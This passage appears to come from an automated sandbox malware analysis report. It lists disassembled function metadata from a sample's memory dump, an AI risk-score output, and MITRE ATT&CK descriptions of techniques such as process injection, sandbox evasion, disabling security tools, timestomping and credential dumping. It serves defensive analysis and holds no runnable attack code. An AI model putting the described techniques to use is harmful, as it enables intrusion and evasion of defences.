Opcode Fuzzy Hash: 5aa5378d630d6f57637fb44b6a8956afe8125603b842f223fcf3fea132f00252
Instruction Fuzzy Hash: FAC11736609B818FC3158F3CC4952A6BFE2AF9A320F1DC6ADD5EA8B3D2D6349405C711

Function 00415F0F Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4504ddb6b9124a10d57000d61d6bbe215923a675a8a9e8c91ecf6e6c0166295
Instruction ID: 02bba17ff1a76ede1ee327d3bc9e298b3db4afb739480289d299968b4f3590e3
Opcode Fuzzy Hash: e4504ddb6b9124a10d57000d61d6bbe215923a675a8a9e8c91ecf6e6c0166295
Instruction Fuzzy Hash: 24A1C875240B00DFD724CF24DC81BA677A2FB9A314F2AC569D09A8B3A5D734AC52CB19

Function 00428C2A Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d54aa694d4a16e7310f2f4cb26cc58cb9ec31ee0d195ac9d1797f50aea24eb30
Instruction ID: 80e227f616da099ea6ca07ff6917ce1ac0c493840e69eb0515369c68d16ea0e1
Opcode Fuzzy Hash: d54aa694d4a16e7310f2f4cb26cc58cb9ec31ee0d195ac9d1797f50aea24eb30
Instruction Fuzzy Hash: 7AA12675A09391CFE310CF28D88032ABBE2AF8A310F198A7DE595973A1C735DD42CB55

Function 00439CF0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee3221d44487f1b55dcfb0cb7b306b7a5088c2c108d24d47baceea343636d859
Instruction ID: 19833f6a1940e23ff807266a8d8c513eb4ba143357f96d908e268e99486f71cf
Opcode Fuzzy Hash: ee3221d44487f1b55dcfb0cb7b306b7a5088c2c108d24d47baceea343636d859
Instruction Fuzzy Hash: 2B516EB15087548FE314DF29D89535BBBE1BBC8318F044A2EE5D987391E379DA088F86

Function 00417DAA Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3eec87fe2e6b3535f62e8ee31a74f448a17c5f8e3076b45f860c3c691a9f1f5
Instruction ID: 2806a6c60dcdade9a109e4eb1c266c37354aedd9af97f0a0e670afd14067213f
Opcode Fuzzy Hash: c3eec87fe2e6b3535f62e8ee31a74f448a17c5f8e3076b45f860c3c691a9f1f5
Instruction Fuzzy Hash: 9441E7756047018BC7248F29C8917B3B7F2FF59314B18856EE4A68B391D738A881C795

Function 0043E8A0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d03022e425d95beae91a25d272ca4f6360437e781e0849ebc759fd24edffb9d2
Instruction ID: fd6f88aa68ca247b4587f7d1a9460dff540b792afa44ed99840666eaceb16a5d
Opcode Fuzzy Hash: d03022e425d95beae91a25d272ca4f6360437e781e0849ebc759fd24edffb9d2
Instruction Fuzzy Hash: FC414673E501214BDB28CF7D8C915ABB7A2ABDA22472E973DC492E7385DE344C068784

Function 00419E70 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc6cad57557abe31136d55441872bcab2133162b111c729cacc7777c3a599b3b
Instruction ID: 5ff92c29d49302e8313681921d8cd02e517ed759288c269039d7e8940e5562aa
Opcode Fuzzy Hash: bc6cad57557abe31136d55441872bcab2133162b111c729cacc7777c3a599b3b
Instruction Fuzzy Hash: 86418B33B1835146D324897D88862B6EAD79BDA218B2DC27BE894CB3C5D17D8C86C359

Function 0043F1BA Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb9c7f2234e9b79d7763f2540d9a94b6f46891398e437f70369f30d97da0caf
Instruction ID: 5cac35742c8906132d4c45ba7911dd0e7eac876e748dd722ceb3a2fb0f07a45f
Opcode Fuzzy Hash: ffb9c7f2234e9b79d7763f2540d9a94b6f46891398e437f70369f30d97da0caf
Instruction Fuzzy Hash: 4F41017290C3428BD310DF66C880267BBE2EBC8305F19C86EE4D49B2A5DB7889458B85

Function 0043D800 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 103bdf9d32906bd66de4c778210ec413147c27b42e6dd4d3cbd85224b3903efe
Instruction ID: f44053d7b12ca113623aac6385a12357a13e9c962bfbc8cf25868e0ee12bc4fb
Opcode Fuzzy Hash: 103bdf9d32906bd66de4c778210ec413147c27b42e6dd4d3cbd85224b3903efe
Instruction Fuzzy Hash: CF413F75D042109BD7159F29EC8072BB761EF8E734F19A62ED5A4173E4C334AC16CB89

Function 0043B4A0 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dfee9a34708fe61651fa85a302dbcbf01428207896a3995ae0549a342fc45088
Instruction ID: 11bb7442db83790db6d842433c9ea8d7d07d87c748064deb490185fede0f4dee
Opcode Fuzzy Hash: dfee9a34708fe61651fa85a302dbcbf01428207896a3995ae0549a342fc45088
Instruction Fuzzy Hash: CD319771A04300BBE714AB20EC41B3BB7A4EF8570CF04552EFA8593291E334EC00869A

Function 00408920 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4744187877c6efeb510b13592ddead2cee382e8e4633dd8572f22e8f4e2bb84
Instruction ID: 37b15c1930fbe6cc6bedd2c66aa6a3ce0f2d803f6c7ae847a82093f6cd115eda
Opcode Fuzzy Hash: f4744187877c6efeb510b13592ddead2cee382e8e4633dd8572f22e8f4e2bb84
Instruction Fuzzy Hash: 4F318633A218114BE754CA29CD0469632939BD9328F3E86B99465DF6D7CD3B9D038680

Function 00429DCC Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4e750f3f9cce3696d4a3d9b01105145935509a0bd1e51bb83504ecd39ae5e96
Instruction ID: 9644d87cc07368134b956aa193e6db3e49d081c9a67959cb173bd34305119a66
Opcode Fuzzy Hash: a4e750f3f9cce3696d4a3d9b01105145935509a0bd1e51bb83504ecd39ae5e96
Instruction Fuzzy Hash: 7C21B472A196208BC3149F25D91126BF3F2EFC2311F0A8A59E5D59B391E7389C01D79A

Function 0040C7B6 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb0040deae28d6bf8de72e45909e4788fb5c4842425c4d77390620ac4ab318a
Instruction ID: 1db67a16e133031d4f094625fbe9f8921e97f2ed6c50270e591cc6c9cdf2cf82
Opcode Fuzzy Hash: 9eb0040deae28d6bf8de72e45909e4788fb5c4842425c4d77390620ac4ab318a
Instruction Fuzzy Hash: 4821DB7111C341DAE304EF29D8A092BB7F1EF96354F049A6CF4D6AB690E3788504CB1E

Function 0041EA90 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1153db9a7a22f48ddaf1b4f032c561a98daf836014eb502ed475dbf98c7a6e6
Instruction ID: a6084b73f2e2f37e23510124a2b3c12ccf1f7bb22b005b62269b2f1384aae6aa
Opcode Fuzzy Hash: c1153db9a7a22f48ddaf1b4f032c561a98daf836014eb502ed475dbf98c7a6e6
Instruction Fuzzy Hash: C7119B367583108EC720CB26DDC5EAAF7D6EBD2315F09C12BF4941B195C1789884C326

Function 00437DF0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: e7c1341c9e6cd4b2317ab60107a228ebae25551ccfbb15703da9790e075ec5ee
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 2511E973A091D44EC3268D3C8401565BFA30AA7235F6993DAF4F89B2D2D6268D8B8359

Function 0042B4E0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 314c65e36146cd711e5616bc2876eb5d37b6a881a3064cbcf58d8b6cf9e018f6
Instruction ID: dbc86e69b3454caeb73afdee2edfbb9ab233688b315c80ef64155bf17bd428b8
Opcode Fuzzy Hash: 314c65e36146cd711e5616bc2876eb5d37b6a881a3064cbcf58d8b6cf9e018f6
Instruction Fuzzy Hash: 83019EB1B1031157DA20AE15A4C1B27A3A9AF8070CF08443EE8185B342EB79FC44C6EA

Function 00427EAD Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56765ce72c551aa9a084b8602c96a4ee933577ad48238e6e7a456a964e29922c
Instruction ID: cd4dcd42ec27cfe7a0226a0ba0c4dd782a608233812f5217b17dba467f853c70
Opcode Fuzzy Hash: 56765ce72c551aa9a084b8602c96a4ee933577ad48238e6e7a456a964e29922c
Instruction Fuzzy Hash: 8221E4B29193908FC314CF29C94015BFBE7ABD9354F168E1DE4D46B694D771C8028F86

Function 0042AF5C Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bca4338740fdd6c4ffbe23628e80e1bd2489841d8a16e1da17b44cc6a789625
Instruction ID: 99028c99b5c927184213efd57407d2dcbc29bcb9e8d1c9607bf734db8e94fb7e
Opcode Fuzzy Hash: 4bca4338740fdd6c4ffbe23628e80e1bd2489841d8a16e1da17b44cc6a789625
Instruction Fuzzy Hash: CD01DB74750110DFE7298F14FC90A377352EB46715FDA462ED0A6221B0E3346C21959E

Function 0042DE89 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f60826a5c108731956e25c5a1e033d45152dc45506eb80abfcb27fc2b29cf926
Instruction ID: b3f8729b99c7e3804e86efe5872578399fbadebf8bd95321bc98dae1e3bfcace
Opcode Fuzzy Hash: f60826a5c108731956e25c5a1e033d45152dc45506eb80abfcb27fc2b29cf926
Instruction Fuzzy Hash: 2801DF706046838FE7118F298410773FBA4AF23350F18A699C4D6CF392DA389886CB68

Function 0043D990 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 916dcb65a10122d7949faac8609d57a738aa8459e74d4253fca38cdc15a1bb50
Instruction ID: 4f3878ebba071c3dc1f5309b21a11a03703f802f4337331099df4c6b80f0c05f
Opcode Fuzzy Hash: 916dcb65a10122d7949faac8609d57a738aa8459e74d4253fca38cdc15a1bb50
Instruction Fuzzy Hash: 74F0F9B6944208ABD3145F06FC40E37B36DEF8F768F15131AF598132A1E322ED2197A9

Function 00402B30 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 531cdd58decae4d9a4c4f27ac2e474779be37447b44434e7daeb645bb0807563
Instruction ID: 9ce3e12eb0a7f281baba32877e35be36dadab8860417ace1400533727192730f
Opcode Fuzzy Hash: 531cdd58decae4d9a4c4f27ac2e474779be37447b44434e7daeb645bb0807563
Instruction Fuzzy Hash: C6F02B3A75421707E310DDA9DCC4527F3E6D7C5614B18403EE984E3380D4B9F8028198

Function 00440340 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e55df2ee1e8df3048ead95107212740c6c2cb92b4a9caf2cb34914cccc6b009e
Instruction ID: 5ece43bef9911ef2b35d314bad60919e09cb960a04b58ea56693e566efcf0696
Opcode Fuzzy Hash: e55df2ee1e8df3048ead95107212740c6c2cb92b4a9caf2cb34914cccc6b009e
Instruction Fuzzy Hash: D7F04C33B040100BE704DA3DEC246ABB7D7DBC6210F0E8679C946DB698D5349402C280

Function 0040D6DE Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0031ef8c0e0e45d4bbb30685fbc5a7f51781d027ba8dac0b6f08e8d6a94d59dd
Instruction ID: d46bbed883f56801a8acdf6f04d97aff90575ad5029f493e343112b2747ef36f
Opcode Fuzzy Hash: 0031ef8c0e0e45d4bbb30685fbc5a7f51781d027ba8dac0b6f08e8d6a94d59dd
Instruction Fuzzy Hash: 32F0F678A002009FE7089B18DC41B36B271FB8A324F58473DE496A32E5D734AC128A0D

Function 0041E800 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: bb1738f77420eab7453f5858bc2a10adfd274667c215a0af47b576d3ea2b9bd7
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: CAD0A775A487A10E5758CE3944A04B7FBE8E947612B18589FE8D1E3205D225EC42869C

Function 004283A6 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e406ce6dfd22121a39c3672ce483386d50acaf7d1ded9e6e8226c170f06dd1
Instruction ID: 94104ea360529fa26c88484afaa6156c3b1c44c0b9bddb771427dc7ce3ca1045
Opcode Fuzzy Hash: 06e406ce6dfd22121a39c3672ce483386d50acaf7d1ded9e6e8226c170f06dd1
Instruction Fuzzy Hash: C6D05B35A1A112C781117B50F88143E72305B9775CF4415BFD08522269EF38B906854F

Function 0042A4C7 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07908245abafecf1328235fb540c2fb0e45efe1de0d8a40c1569c09169474d6
Instruction ID: da4ac2ee05969a7c27b64df1879a2b222b7ad13fc2dff2d70f21af7b1f02120a
Opcode Fuzzy Hash: a07908245abafecf1328235fb540c2fb0e45efe1de0d8a40c1569c09169474d6
Instruction Fuzzy Hash: CF900225D4C1008681008F049440470E278930B111F243550900CF3011C750DC42455C

Function 00434EA8 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00434ED6

Strings

J, xrefs: 00434EF6
_, xrefs: 00434F06
\, xrefs: 00434F3E
Y, xrefs: 00434F0E
^, xrefs: 00434EFE
F, xrefs: 00434F36
$, xrefs: 00434EAC
T, xrefs: 00434F2E
J, xrefs: 00434F16
e, xrefs: 00434F26
P, xrefs: 00434F1E

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitVariant
String ID: $$F$J$J$P$T$Y$\$^$_$e
API String ID: 1927566239-2265742063
Opcode ID: dee2d394afdb024f6af2cff23f1d2af5a74deb9203b46f1f3d344699b2cfc2e5
Instruction ID: 5c703e15b1e879e274141d265bef698b2514bc1598f33eef4bd7dbb519a1d5d7
Opcode Fuzzy Hash: dee2d394afdb024f6af2cff23f1d2af5a74deb9203b46f1f3d344699b2cfc2e5
Instruction Fuzzy Hash: 1F412961108B818ED715CF388894716BFA16F67324F09C6CDD9A94F3EBC775940ACBA2

Function 004358B3 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 93COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004358F8

Strings

\, xrefs: 00435960
J, xrefs: 00435938
Y, xrefs: 00435930
P, xrefs: 00435940
^, xrefs: 00435920
F, xrefs: 00435958
T, xrefs: 00435950
e, xrefs: 00435948
J, xrefs: 00435918
_, xrefs: 00435928

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: InitVariant
String ID: F$J$J$P$T$Y$\$^$_$e
API String ID: 1927566239-3441486906
Opcode ID: 16a0d25439ac5fdb8eb52718720777bea0252af37b24ceb6037ce3a491959a8d
Instruction ID: 18ab3b5898e430b6a732da35bea9aad92cffba2007e16ebce8a9af90964d5ebf
Opcode Fuzzy Hash: 16a0d25439ac5fdb8eb52718720777bea0252af37b24ceb6037ce3a491959a8d
Instruction Fuzzy Hash: A2411C61109B818ED715CF38C894756BF916F56324F08C69CC9E90F3EAC6759506CB62

Function 004297E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042986C

Strings

D`a&, xrefs: 0042983D, 00429825
D`a&, xrefs: 004298BB

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: D`a&$D`a&
API String ID: 237503144-2409829873
Opcode ID: 761206987ac2b96abb939d1f998bcfd00da83192f5cde56c81a284e7b20112f7
Instruction ID: 2464d190bea37a10a9128d7142308aec4152c28308ba6278dae345e9c0eb9975
Opcode Fuzzy Hash: 761206987ac2b96abb939d1f998bcfd00da83192f5cde56c81a284e7b20112f7
Instruction Fuzzy Hash: 3921233025C3559FD324CF689C40B6FB7E5EFC2304F05892CE5969B2C0D6748606CBAA

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
